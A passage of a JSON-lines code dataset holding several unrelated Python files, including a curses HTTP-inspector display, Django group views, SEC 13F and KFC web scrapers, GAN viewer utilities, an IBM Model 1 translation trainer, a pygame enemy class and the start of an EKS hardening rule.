characters\n hits_str = str(hits)\n start_point = self._width - 2 * len(hits_str)\n self._stdscr.move(7, start_point)\n self._stdscr.clrtoeol()\n self._stdscr.addstr(7, self._width - len(hits_str), hits_str)\n self._stdscr.refresh()\n\n def update_top_sites(self, top_sites):\n self._clear_after_line(self._get_top_sites_start() + 1)\n for indx, val in enumerate(top_sites):\n self._stdscr.addstr(self._get_top_sites_start() + indx + 1, 0, str(val[0])[:self._width - 3])\n self._stdscr.addstr(self._get_top_sites_start() + indx + 1, self._width - len(str(val[1])), str(val[1]))\n self._stdscr.refresh()\n\n def _clear_after_line(self, line):\n self._stdscr.move(line, 0)\n self._stdscr.clrtobot()\n\n def _get_top_sites_start(self):\n return self._alerts_bottom + self._top_sites_padding + 1\n","repo_name":"krumbot/http-inspector","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74092320830","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom account.models import Account\nfrom group.models import Group\nfrom group.forms import GroupForm\n\n\nclass GroupsView(View):\n def get(self, request):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n groups = main_user.group.all()\n groups_under_management = groups.filter(admin=main_user)\n return render(request, 'group/groups.html', context={'main_user': main_user,\n 'groups': groups,\n 'groups_under_management': groups_under_management})\n\n\nclass GroupView(View):\n def get(self, request, pk):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.select_related().get(pk=pk)\n posts = group.posts.select_related()\n return render(request, 'group/public.html', context={'main_user': main_user,\n 'group': group,\n 'posts': posts})\n\n\nclass GroupCreateView(View):\n def get(self, request):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n form = GroupForm\n return render(request, 'group/create.html', context={'main_user': main_user,\n 'form': form})\n\n def post(self, request):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.create()\n form = GroupForm(request.POST, instance=group)\n if form.is_valid():\n group.admin.add(main_user)\n group.subscribers.add(main_user)\n form.save()\n group.save()\n return redirect('group', pk=group.pk)\n\n\nclass GroupEditView(View):\n def get(self, request, pk):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.select_related().get(pk=pk)\n form = GroupForm(instance=group)\n return render(request, 'group/edit.html', context={'main_user': main_user,\n 'group': group,\n 'form': form})\n\n def post(self, request, pk):\n group = Group.objects.select_related().get(pk=pk)\n form = GroupForm(request.POST, instance=group)\n if form.is_valid():\n form.save()\n return redirect('group', pk=group.pk)\n\n\nclass SubscribeToGroup(View):\n def get(self, request, pk):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.select_related().get(pk=pk)\n group.subscribers.add(main_user)\n group.save()\n return redirect('group', pk=group.pk)","repo_name":"DimaKalbfleysh/vk2.0","sub_path":"vk2/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"40678079420","text":"from unicodedata import name\nimport pandas as pd\nimport requests\nimport re\nimport csv\nimport lxml\nfrom bs4 import BeautifulSoup\n\nsec_url = 'https://www.sec.gov'\n\ndef get_request(url):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'HOST': 'www.sec.gov',\n }\n return requests.get(url, headers=headers)\n\ndef create_url(cik):\n return 'https://www.sec.gov/cgi-bin/browse-edgar?CIK={}&owner=exclude&action=getcompany&type=13F-HR'.format(cik)\n\ndef get_user_input():\n cik = input(\"Enter 10-digit CIK number: \")\n return cik\n\n\ndef scrap_company_report(requested_cik):\n # Find mutual fund by CIK number on EDGAR\n response = get_request(create_url(requested_cik))\n soup = BeautifulSoup(response.text, \"html.parser\")\n tags = soup.findAll('a', id=\"documentsbutton\")\n\n last_report = (sec_url + tags[0]['href'])\n previous_report = (sec_url + tags[1]['href'])\n scrap_report_by_url(last_report, \"last_report\")\n scrap_report_by_url(previous_report, \"previous_report\")\n\n\ndef scrap_report_by_url(url, filename):\n response_two = get_request(url)\n soup_two = BeautifulSoup(response_two.text, \"html.parser\")\n tags_two = soup_two.findAll('a', attrs={'href': re.compile('xml')})\n xml_url = tags_two[3].get('href')\n\n response_xml = get_request(sec_url + xml_url)\n soup_xml = BeautifulSoup(response_xml.content, \"lxml\")\n xml_to_csv(soup_xml, filename)\n\n\ndef xml_to_csv(soup_xml, name):\n\n columns = [\n \"Name of Issuer\",\n \"CUSIP\",\n \"Value (x$1000)\",\n \"Shares\",\n \"Investment Discretion\",\n \"Voting Sole / Shared / None\"\n ]\n issuers = soup_xml.body.findAll(re.compile('nameofissuer'))\n cusips = soup_xml.body.findAll(re.compile('cusip'))\n values = soup_xml.body.findAll(re.compile('value'))\n sshprnamts = soup_xml.body.findAll('sshprnamt')\n sshprnamttypes = soup_xml.body.findAll(re.compile('sshprnamttype'))\n investmentdiscretions = soup_xml.body.findAll(re.compile('investmentdiscretion'))\n soles = soup_xml.body.findAll(re.compile('sole'))\n shareds = soup_xml.body.findAll(re.compile('shared'))\n nones = soup_xml.body.findAll(re.compile('none'))\n\n df = pd.DataFrame(columns= columns)\n\n for issuer, cusip, value, sshprnamt, sshprnamttype, investmentdiscretion, sole, shared, none in zip(issuers, cusips, values, sshprnamts, sshprnamttypes, investmentdiscretions, soles, shareds, nones):\n row = {\n \"Name of Issuer\": issuer.text,\n \"CUSIP\": cusip.text,\n \"Value (x$1000)\": value.text,\n \"Shares\": f\"{sshprnamt.text} {sshprnamttype.text}\",\n \"Investment Discretion\": investmentdiscretion.text,\n \"Voting Sole / Shared / None\": f\"{sole.text} / {shared.text} / {none.text}\"\n }\n df = df.append(row, ignore_index=True)\n\n\n df.to_csv(f\"{name}.csv\")\n\n\nrequested_cik = get_user_input()\nscrap_company_report(requested_cik)\n","repo_name":"CodeWritingCow/sec-web-scraper-13f","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"60"} +{"seq_id":"6202934350","text":"def reverse(a):\n a_list = []\n for i in range(len(a)):\n a_list.append(a[len(a) - 1 -i])\n b = ''\n for j in range(len(a_list)):\n b += a_list[j]\n\n return b\n\ndef biggerOne(a,b):\n if a > b:\n return a\n else:\n return b\n\n\na, b = input().split()\n\na = reverse(a)\nb = reverse(b)\n\nprint(biggerOne(a,b))\n\n\n","repo_name":"raipier8818/BaekJoon","sub_path":"Python/2908.py","file_name":"2908.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10229560442","text":"from inspect import getmembers, isfunction\nimport sys\nimport time\nimport numpy as np\nimport torch\nimport imgui\nimport cachetools\nimport contextlib\nimport pickle\nfrom cachetools.keys import hashkey\nfrom tqdm import tqdm\nfrom io import BytesIO\nfrom pathlib import Path\n\nimport sys, os\nsys.path += [os.path.abspath(os.path.dirname(__file__) + '/..')]\nfrom dnnlib import EasyDict\nfrom torch_utils.misc import named_params_and_buffers\n\n# Decorator for adding static state to function\ndef with_state(**kwargs):\n class State(EasyDict):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n setattr(self, 'defaults', kwargs)\n\n def reset(self):\n for k,v in self.defaults.items():\n self[k] = v\n\n def decorate(func):\n from functools import partial\n return partial(func, state=State(**kwargs))\n \n return decorate\n\n# Used to detect parameter changes for lazy recomputation\nclass ParamCache():\n def update(self, **kwargs):\n dirty = False\n for argname, val in kwargs.items():\n # Check pointer, then value\n current = getattr(self, argname, 0)\n if current is not val and pickle.dumps(current) != pickle.dumps(val):\n setattr(self, argname, val)\n dirty = True\n return dirty\n\n# Redirect stdout, stderr to UI\nclass Logger(object):\n def __init__(self, capacity=20, callback=lambda _ : None):\n self.capacity = capacity\n self.callback = callback\n self.queue = []\n self.str = ''\n\n self.stdout = sys.stdout\n self.stderr = sys.stderr\n\n sys.stdout = self\n sys.stderr = self\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n def flush(self):\n self.stdout.flush()\n\n def close(self):\n self.flush()\n\n # if using multiple loggers, prevent closing in wrong order\n if sys.stdout is self:\n sys.stdout = self.stdout\n if sys.stderr is self:\n sys.stderr = self.stderr\n\n # Print calls write for each token\n def write(self, message):\n if isinstance(message, bytes):\n message = message.decode()\n \n # Workaround for a bug in VSCode debugger:\n # sys.stdout.write(''); sys.stdout.flush() => crash\n if len(message) == 0:\n return\n \n self.stdout.write(message)\n self.update_str(message)\n self.callback(message)\n\n def update_str(self, message):\n # Capacity ignored for now\n self.queue.append(message)\n self.str = ''.join(self.queue)\n\n def __getattr__(self, attr):\n return getattr(self.stdout, attr)\n\nclass Timer():\n def __init__(self, n_avg=1):\n self.len = n_avg\n self.reset()\n\n def reset(self):\n self.tlast = time.time()\n self.deltas = [0.0] * self.len # circular buffer\n self.idx = 0\n \n def tick(self):\n t = time.time()\n self.deltas[self.idx] = t - self.tlast\n self.idx = (self.idx + 1) % self.len\n self.tlast = t\n\n return sum(self.deltas) / self.len\n\n# with-block for item id\n@contextlib.contextmanager\ndef imgui_id(id: str):\n imgui.push_id(id)\n yield\n imgui.pop_id()\n\n# with-block for item width\n@contextlib.contextmanager\ndef imgui_item_width(size):\n imgui.push_item_width(size)\n yield\n imgui.pop_item_width()\n\n# Full screen imgui window\ndef begin_inline(name):\n with imgui.styled(imgui.STYLE_WINDOW_ROUNDING, 0):\n imgui.begin(name,\n flags = \\\n imgui.WINDOW_NO_TITLE_BAR |\n imgui.WINDOW_NO_RESIZE |\n imgui.WINDOW_NO_MOVE |\n imgui.WINDOW_NO_COLLAPSE |\n imgui.WINDOW_NO_SCROLLBAR |\n imgui.WINDOW_NO_SAVED_SETTINGS\n )\n\n# Recursive getattr\ndef rgetattr(obj, key, default=None):\n head = obj\n while '.' in key:\n bot, key = key.split('.', maxsplit=1)\n head = getattr(head, bot, {})\n return getattr(head, key, default)\n\ndef dict_diff(d1, d2):\n return _dict_diff_impl(d1, d2, {}, {}, {})\n\n# Compare two dicts, return partition of unique values\ndef _dict_diff_impl(d1, d2, left, right, changed): # cannot use default args => remembered between calls!\n only_left = set(d1.keys()) - set(d2.keys())\n only_right = set(d2.keys()) - set(d1.keys())\n both = set(d1.keys()).intersection(d2.keys())\n\n for k in only_left:\n left[k] = d1[k]\n\n for k in only_right:\n right[k] = d2[k]\n\n for k in both:\n if isinstance(d1[k], (dict, EasyDict)):\n for d in [left, right, changed]:\n d[k] = {}\n _dict_diff_impl(d1[k], d2[k], left[k], right[k], changed[k])\n for d in [left, right, changed]:\n if d[k] == {}:\n del d[k]\n elif d1[k] != d2[k]:\n changed[k] = (d1[k], d2[k])\n\n return (left, right, changed)\n\n# Combo box that returns value, not index\ndef combo_box_vals(title, values, current, height_in_items=-1, to_str=lambda v: v):\n curr_idx = 0 if current not in values else values.index(current)\n changed, ind = imgui.combo(title, curr_idx, [to_str(v) for v in values], height_in_items)\n return changed, values[ind]\n\n# Int2 slider that prevents overlap\ndef slider_range(v1, v2, vmin, vmax, push=False, title='', width=0.0):\n imgui.push_item_width(width)\n s, e = imgui.slider_int2(title, v1, v2, vmin, vmax)[1]\n imgui.pop_item_width()\n\n if push:\n return (min(s, e), max(s, e))\n elif s != v1:\n return (min(s, e), e)\n elif e != v2:\n return (s, max(s, e))\n else:\n return (s, e)\n\ndef parse_res(res_str):\n res_confs = {\n '256x256': (2, 2, 7),\n '384x256': (3, 2, 7),\n '640x384': (5, 3, 7),\n '512x512': (4, 4, 7),\n '512x640': (4, 5, 7),\n '1024x1024': (4, 4, 8),\n '1280x768': (5, 3, 8),\n }\n assert res_str in res_confs, f'Unknown resolution {res_str}'\n return res_confs[res_str]\n\n# Shape batch as square if possible\ndef get_grid_dims(B):\n if B == 0:\n return (0, 0)\n \n S = int(B**0.5 + 0.5)\n while B % S != 0:\n S -= 1\n return (B // S, S) # (W, H)\n\ndef reshape_grid_np(img_batch):\n if isinstance(img_batch, list):\n img_batch = np.concatenate(img_batch, axis=0) # along batch dim\n \n B, C, H, W = img_batch.shape\n cols, rows = get_grid_dims(B)\n\n img_batch = np.reshape(img_batch, [rows, cols, C, H, W])\n img_batch = np.transpose(img_batch, [0, 3, 1, 4, 2])\n img_batch = np.reshape(img_batch, [rows * H, cols * W, C])\n\n return img_batch\n\ndef reshape_grid_torch(img_batch):\n if isinstance(img_batch, list):\n img_batch = torch.cat(img_batch, axis=0) # along batch dim\n \n B, C, H, W = img_batch.shape\n cols, rows = get_grid_dims(B)\n\n img_batch = img_batch.reshape(rows, cols, C, H, W)\n img_batch = img_batch.permute(0, 3, 1, 4, 2)\n img_batch = img_batch.reshape(rows * H, cols * W, C)\n\n return img_batch\n\ndef reshape_grid(batch):\n return reshape_grid_torch(batch) if torch.is_tensor(batch) else reshape_grid_np(batch)\n\ndef sample_seeds(N, base=None):\n if base is None:\n base = np.random.randint(np.iinfo(np.int32).max - N)\n return [(base + s) for s in range(N)]\n\ndef sample_latent(B, n_dims=512, seed=None):\n seeds = sample_seeds(B, base=seed)\n return seeds_to_latents(seeds, n_dims)\n\ndef seeds_to_latents(seeds, n_dims=512):\n latents = np.zeros((len(seeds), n_dims), dtype=np.float32)\n for i, seed in enumerate(seeds):\n rng = np.random.RandomState(seed)\n latents[i] = rng.standard_normal(n_dims)\n \n return latents\n\n# Map stack of per-frequency ts to single global t\ndef stack_to_global_t(ts, fs):\n assert isinstance(ts, np.ndarray) and (ts.size % fs.size == 0), \\\n 'ts must be numpy array of shape (B, n_freq) or (n_freq)'\n\n ts = ts.reshape(-1, fs.shape[-1])\n\n B, num_f = ts.shape\n assert num_f == len(fs), 'Len of ts and fs must match'\n\n T, *ts = ts.T.reshape(num_f, B, 1) # (B, 1) for every frequency\n f0, *fs = fs\n assert f0 < 0.1, 'f0 is not linear'\n assert all(f2 >= f1 for f2,f1 in zip(fs[1:], fs[:-1])), 'fs not sorted'\n\n for f, t in zip(fs, ts):\n # Remove offset w.r.t frequency,\n # override with provided offset\n T = T - np.fmod(T, 1/f) + np.fmod(t, 1/f)\n\n return T\n\ndef parse_n_styles(net):\n return net.num_ws\n\ndef parse_z_dims(net):\n return net.z_dim\n\ndef parse_cond_type(net):\n return rgetattr(net, 'init_kwargs.cond_args.type', 'none')\n\ndef pca_sanity(X, transformer):\n # Statistics\n #total_var = X.var(axis=0).sum() # total variance\n #mean = X.mean(axis=0, keepdims=True) # mean\n stdev = np.dot(transformer.components_, X.T).std(axis=1) # projected stdev\n\n # Sort components based on explained variance\n idx = np.argsort(stdev)[::-1]\n\n # Components should be sorted by default\n assert all(idx[1:] > idx[:-1]), 'PCA produced non-sorted basis'\n\n # Check orthogonality\n from itertools import combinations\n dotps = [np.dot(*transformer.components_[[i, j]])\n for (i, j) in combinations(range(X.shape[1]), 2)]\n if not np.allclose(dotps, 0, atol=1e-4):\n print('PCA components not orghogonal, max dot', np.abs(dotps).max())\n\n# Wrapper for computing pca in separate process\ndef pca_w_process(pipe, pkl, N=1_000_000, B=10_000):\n import dnnlib\n import pickle\n \n with dnnlib.util.open_url(pkl) as f:\n G = pickle.load(f)['G_ema']\n G = G.to('cpu') # don't need GPU for just mapping network\n \n comps = pca_w(G, N, B, lambda d : pipe.send(d))\n pipe.send(comps)\n pipe.close()\n\n# Run incremental PCA on W space\ndef pca_w(G, N=1_000_000, B=10_000, progress_callback=lambda t: None):\n np.random.seed(0)\n torch.random.manual_seed(0)\n \n N = (((N - 1) // B) + 1) * B\n\n # Result of PCA depends on conditioning?\n if G.mapping.c_dim > 0:\n print('WARNING: PCA dependent on t, fixing to t=0.5')\n\n # Run PCA\n from sklearn.decomposition import IncrementalPCA\n transformer = IncrementalPCA(150, whiten=False, batch_size=2*G.w_dim)\n\n G.mapping.num_ws = 1 # don't broadcast result\n \n with torch.no_grad():\n for b in range(0, N, B):\n progress_callback(f'Computing PCA ({100*b//N}%)')\n cs = 0.5 * torch.ones(B, G.mapping.c_dim) # no variation w.r.t. cond\n z = torch.randn(B, G.z_dim)\n w = G.mapping(z, cs, truncation_psi=1.0).reshape(-1, G.w_dim)\n transformer.partial_fit(w.numpy())\n\n # Check orthogonality etc.\n transformer.components_ = transformer.components_.astype(np.float32)\n stdev = np.sqrt(transformer.explained_variance_).astype(np.float32)\n #pca_sanity(X, transformer)\n\n return (transformer.components_, stdev)\n\ndef cff_max_layer(G):\n return len(_get_cff_layers(G))\n\ndef _get_cff_layers(G):\n include = ['affine', 'weight']\n exclude = ['rgb', 'affine_c', 'input']\n \n names = []\n for n, _ in named_params_and_buffers(G):\n incl = all(k in n.lower() for k in include)\n excl = any(k in n.lower() for k in exclude)\n if incl and not excl:\n names.append(n)\n \n return names\n\n# l_start, l_end: zero-based style indices\ncff_cache = cachetools.LRUCache(100)\n@cachetools.cached(cache=cff_cache, key=lambda G, s, e, m, c: hashkey(s, e, m)) # ignore uncachable vals\ndef compute_cff(G, l_start=0, l_end=None, mode='SVD U', progress_callback=lambda t: None):\n from scipy.linalg import svd\n\n progress_callback('Collecting weight matrices')\n names = _get_cff_layers(G)\n n_styles = parse_n_styles(G)\n\n assert len(names) > 0, 'No modulation weights in model, cannot compute CFF'\n if len(names) != n_styles - 1:\n print(f'WARN (CFF): number of mod_weights ({len(names)}) does not match layer count ({n_styles}) - 1')\n \n # Compute SVD of all chosen layers at once\n # => finds dirs that activate whole range at once\n # => all layers: close to PCA-W behavior\n # => single layer: localized changes\n s, e = (l_start, l_end or len(names))\n mats = [t.data.cpu().numpy().T for n,t in named_params_and_buffers(G) if n in names]\n weight_full = np.concatenate(mats[s:e], axis=1).astype(np.float32) # [512, ~5000]\n \n comp, stdev = (None, None)\n\n progress_callback('Computing decomposition...')\n\n # Left-singular SVD vectors\n if mode == 'SVD U':\n U, sigma, V = svd(weight_full, lapack_driver='gesvd') # more accurate triangular solver\n comp, stdev = (U.T, np.sqrt(sigma))\n elif mode == 'SVD V':\n # This mode makes no sense, can be e.g. shape [32, 32] for only last layer\n # ...unless applied not to w, but to s (i.e. after affine)?\n U, sigma, V = svd(weight_full, lapack_driver='gesvd')\n comp, stdev = (V.T, np.sqrt(sigma))\n elif mode == 'SeFa Unscaled':\n eigval, comps = np.linalg.eig(weight_full.dot(weight_full.T)) # WW^T = 512x512\n comp, stdev = (comps.T, eigval)\n elif mode == 'SeFa':\n weight_full = weight_full / np.linalg.norm(weight_full, axis=0, keepdims=True)\n eigval, comps = np.linalg.eig(weight_full.dot(weight_full.T)) # WW^T = 512x512\n comp, stdev = (comps.T, eigval)\n else:\n raise RuntimeError('Unknown CFF mode ' + mode)\n\n # Normalize, just to be sure\n comp /= np.linalg.norm(comp, axis=-1, keepdims=True) # [n_comp, w_dims]\n stdev = np.ones_like(stdev) # use ones instead for now\n\n progress_callback('')\n return (comp, stdev)\n\n# File copy with progress bar\n# For slow network drives etc.\ndef copy_with_progress(pth_from, pth_to):\n os.makedirs(pth_to.parent, exist_ok=True)\n size = int(os.path.getsize(pth_from))\n fin = open(pth_from, 'rb')\n fout = open(pth_to, 'ab')\n\n try:\n with tqdm(ncols=80, total=size, bar_format=pth_from.name + ' {l_bar}{bar} | Remaining: {remaining}') as pbar:\n while True:\n buf = fin.read(4*2**20) # 4 MiB\n if len(buf) == 0:\n break\n fout.write(buf)\n pbar.update(len(buf))\n except Exception as e:\n print(f'File copy failed: {e}')\n finally:\n fin.close()\n fout.close()\n\n# File open with progress bar\n# For slow network drives etc.\n# Supports context manager\ndef open_prog(pth, mode):\n size = int(os.path.getsize(pth))\n fin = open(pth, 'rb')\n\n assert mode == 'rb', 'Only rb supported'\n fout = BytesIO()\n\n try:\n with tqdm(ncols=80, total=size, bar_format=Path(pth).name + ' {l_bar}{bar}| Remaining: {remaining}') as pbar:\n while True:\n buf = fin.read(4*2**20) # 4 MiB\n if len(buf) == 0:\n break\n fout.write(buf)\n pbar.update(len(buf))\n except Exception as e:\n print(f'File copy failed: {e}')\n finally:\n fin.close()\n fout.seek(0)\n\n return fout","repo_name":"harskish/tlgan","sub_path":"viewer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15091,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"60"} +{"seq_id":"13382339979","text":"# * Program 15\n\nbooks = []\nbookdic = {}\n\n\ndef isEmpty(s):\n '''Checks if the stack is Empty or not.'''\n if len(s) == 0:\n return True\n return False\n\n\ndef enterdictionary():\n '''Stores the Book ID and Names of the Books in a dictionary.'''\n e = eval(\n input('Enter a dictionary containing Book ID And Book Name:\\n'))\n bookdic.update(e)\n\n\ndef pushvalues():\n '''Adds the names of the Books starting with A or C to a stack.'''\n for i in list(bookdic.values()):\n if i[0] in 'CcAa':\n books.append(i)\n bookdic.clear()\n\n\ndef popvalues():\n '''Removes and Returns a value from the stack.'''\n if isEmpty(books):\n return 'Stack Empty'\n return books.pop()\n\n\ndef peekvalues():\n '''Returns the topmost value from the stack.'''\n if isEmpty(books):\n return 'Stack Empty'\n return books[-1]\n\n\ndef display():\n '''Displays the whole stack from the top.'''\n if isEmpty(books):\n print('Stack Empty')\n for i in books[::-1]:\n print(i)\n\n\nd = 'Yy'\nwhile d in 'Yy':\n n = int(input('''Enter 1 to store book details like Book ID & Book Name in a dictionary format.\nEnter 2 to Push Names of the Books which start with A or C to stack.\nEnter 3 to Remove an element from the stack.\nEnter 4 to Peek the stack.\nEnter 5 to Display the stack.\\n'''))\n if n == 1:\n a = 'Yy'\n while a in 'Yy':\n enterdictionary()\n a = input('Do you want to add more records? (Y/N)\\n')\n elif n == 2:\n pushvalues()\n elif n == 3:\n print(popvalues())\n elif n == 4:\n print(peekvalues())\n elif n == 5:\n display()\n else:\n print('Wrong Input!\\nTry Again!')\n d = input('Do you want to try again? (Y/N)\\n')\n","repo_name":"ULTRAZAP/RecordPrograms","sub_path":"Programs/15thProgram.py","file_name":"15thProgram.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24160341547","text":"import requests\n\nif __name__ == \"__main__\":\n url = \"http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword\"\n headers = {\n \"User-Agent\": \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 Edg/89.0.774.50\"\n }\n page = [1, 2, 3]\n for p in page:\n params = {\n \"cname\": '',\n \"pid\": '',\n \"keyword\": \"成都\",\n \"pageIndex\": str(p),\n \"pageSize\": \"10\"\n }\n # 请求空页面只会返回空数据,不会报错\n try:\n response = requests.post(url=url, headers=headers, params=params)\n print(response.text)\n except:\n print(\"page \" + str(p) + \" error!\")\n print(\"finish!\")","repo_name":"liuziqi/Crwaler","sub_path":"05.作业-爬取KFC餐厅信息.py","file_name":"05.作业-爬取KFC餐厅信息.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24116241592","text":"# import nltk\r\nfrom nltk.tokenize import word_tokenize\r\nimport IBM1_EM\r\nimport string\r\nimport numpy as np\r\n\r\ndef sen_tokenizer(plist_sentence, pint_max_trans):\r\n lst_final = list()\r\n # (value, key)\r\n word_dict = {} # will keep the word and order in its language\r\n # (key, value)\r\n reverse_dict = {}\r\n int_order = 0\r\n int_count = 0\r\n\r\n # creating a table (33: None, ...) where 33 is the unicode of the characters\r\n tbl_translate = dict((ord(char), None) for char in string.punctuation)\r\n\r\n for lst_indiv_sen in plist_sentence[:pint_max_trans]:\r\n if int_count == 0:\r\n # The \\ufeff is only found in the first line. It’s the beginning of the file.\r\n lst_indiv_sen = lst_indiv_sen.replace(u'\\ufeff', '')\r\n int_count += 1\r\n\r\n # returns a string where some specified characters are replaced with the character described in a dictionary\r\n lst_indiv_sen = lst_indiv_sen.translate(tbl_translate) #remove punctuation\r\n lst_tokens = word_tokenize(lst_indiv_sen.lower())\r\n\r\n str_output = \"\"\r\n\r\n # loop for storing the tokens in the two dictionaries and in the output string\r\n for str_token in lst_tokens:\r\n if str_token not in word_dict:\r\n word_dict[str_token] = int_order\r\n reverse_dict[int_order] = str_token\r\n int_order += 1\r\n # adding the token to the stored string\r\n str_output = str_output + str_token + \" \"\r\n\r\n str_output = str_output[:(len(str_output) - 1)] # remove last space\r\n\r\n # storing the output in the final list at the end\r\n lst_final.append(str_output)\r\n\r\n # replacing the ufeff character from document start with empty string\r\n lst_final[0] = lst_final[0].replace(u'\\ufeff', '') # ufeff character from document start\r\n return lst_final, word_dict, reverse_dict\r\n\r\n\r\ndef model_trainer():\r\n # Opening the data sets and putting it in an object\r\n with open(\"English.txt\", encoding=\"utf8\") as text_file:\r\n obj_data_en = text_file.readlines()\r\n\r\n with open(\"Tagalog.txt\", encoding=\"utf8\") as text_file:\r\n obj_data_fil = text_file.readlines()\r\n\r\n # Lists for the new data\r\n lst_new_en = list()\r\n lst_new_fil = list()\r\n\r\n for sen_counter in range(len(obj_data_en)):\r\n if sen_counter > 500000:\r\n break\r\n\r\n # Splits the sentence word by word\r\n current_en_sen = obj_data_en[sen_counter].split() #tokenizing current sentence\r\n current_fil_sen = obj_data_fil[sen_counter].split()\r\n\r\n # Adds the sentence at the end of the list\r\n lst_new_en.append(obj_data_en[sen_counter])\r\n lst_new_fil.append(obj_data_fil[sen_counter])\r\n\r\n # putting the tokenized data to the data variables\r\n # list of sentences where each sentence is a list of words\r\n obj_data_en = lst_new_en.copy() # obj_data_en is now a list of tokenized sentence\r\n obj_data_fil = lst_new_fil.copy() # i.e. a list of sentences where each sentence is a list of words\r\n\r\n max_trans = 14075\r\n # max_trans = 3000\r\n\r\n # for parsing the filipino sentences and tokenizing the words\r\n lst_fil_sen, fil_word_dict, reverse_fil_dict = sen_tokenizer(obj_data_fil, max_trans)\r\n\r\n # for parsing the english sentences and tokenizing the words\r\n lst_en_sen, en_word_dict, reverse_en_dict = sen_tokenizer(obj_data_en, max_trans)\r\n\r\n \r\n #run the EM algorithm of IBM Model 1\r\n translate_eng_fil = IBM1_EM.expect_max(fil_word_dict,en_word_dict,lst_fil_sen,lst_en_sen)\r\n \r\n\r\n # The following code finds out the maximum probability \r\n # for translating a tagalog/English word to English/tagalog\r\n # from the existing e-f matrix.\r\n # These maximum probabilities are stored in dictionaries \r\n # and saved as .npy files for being used for translation\r\n \r\n total_tagalog_ocurrences = translate_eng_fil.shape[0]\r\n total_eng_occurrences = translate_eng_fil.shape[1]\r\n\r\n #final dictionaries for translation mapping\r\n english_map = {}\r\n tagalog_map = {}\r\n\r\n for eng_marker in range(total_eng_occurrences): #for all foreign words f do\r\n maximum = -100\r\n i = 0\r\n for tagalog_marker in range(total_tagalog_ocurrences):\r\n #for all English words e do\r\n if translate_eng_fil[tagalog_marker][eng_marker] > maximum : \r\n maximum = translate_eng_fil[tagalog_marker][eng_marker]\r\n i = tagalog_marker\r\n\r\n english_map[reverse_en_dict[eng_marker]] = reverse_fil_dict[i]\r\n #end for\r\n #end for\r\n for tagalog_marker in range(total_tagalog_ocurrences): #for all foreign words f do\r\n maximum = -100\r\n i = 0\r\n for eng_marker in range(total_eng_occurrences):\r\n #for all English words e do\r\n if translate_eng_fil[tagalog_marker][eng_marker] > maximum : \r\n maximum = translate_eng_fil[tagalog_marker][eng_marker]\r\n i = eng_marker\r\n #end for\r\n tagalog_map[reverse_fil_dict[tagalog_marker]] = reverse_en_dict[i]\r\n #end for \r\n\r\n np.save(\"trained_data/tagalog_to_english_maximised\", tagalog_map)\r\n np.save(\"trained_data/english_to_tagalog_maximised\", english_map)\r\n","repo_name":"JakeCob/Project-AI","sub_path":"ModelTrainer.py","file_name":"ModelTrainer.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42149076328","text":"import pygame\n\nclass Enemy():\n def __init__(self, x, y, radius, surface, player):\n\n self.surface = surface\n\n self.x = x\n self.y = y\n self.radius = radius\n\n self.player = player\n self.enemy_vel = 2\n \n def __draw(self):\n pygame.draw.circle(self.surface, (80, 150, 50), (self.x - self.player.cam_scroll[0], self.y - self.player.cam_scroll[1]), self.radius)\n\n def _enemyMovement(self):\n\n if self.radius > self.player.radius:\n if self.x < self.player.x:\n self.x += self.enemy_vel\n if self.x > self.player.x:\n self.x -= self.enemy_vel\n if self.y < self.player.y:\n self.y += self.enemy_vel\n if self.y > self.player.y:\n self.y -= self.enemy_vel\n \n elif self.radius <= self.player.radius:\n if self.x < self.player.x:\n self.x -= self.enemy_vel\n if self.x > self.player.x:\n self.x += self.enemy_vel\n if self.y < self.player.y:\n self.y -= self.enemy_vel\n if self.y > self.player.y:\n self.y += self.enemy_vel\n \n def update(self):\n self.__draw()\n self._enemyMovement()\n","repo_name":"R34prZ/PyGar.io","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20000043878","text":"import re\nimport kubernetes\nfrom hardeneks import helpers\nfrom hardeneks.rules import Rule, Result\nfrom hardeneks import Resources\nimport boto3\nimport pprint\n\nclass get_EKS_version(Rule):\n _type = \"cluster_wide\"\n pillar = \"cluster_data\"\n section = \"control_plane\"\n message = \"Get EKS 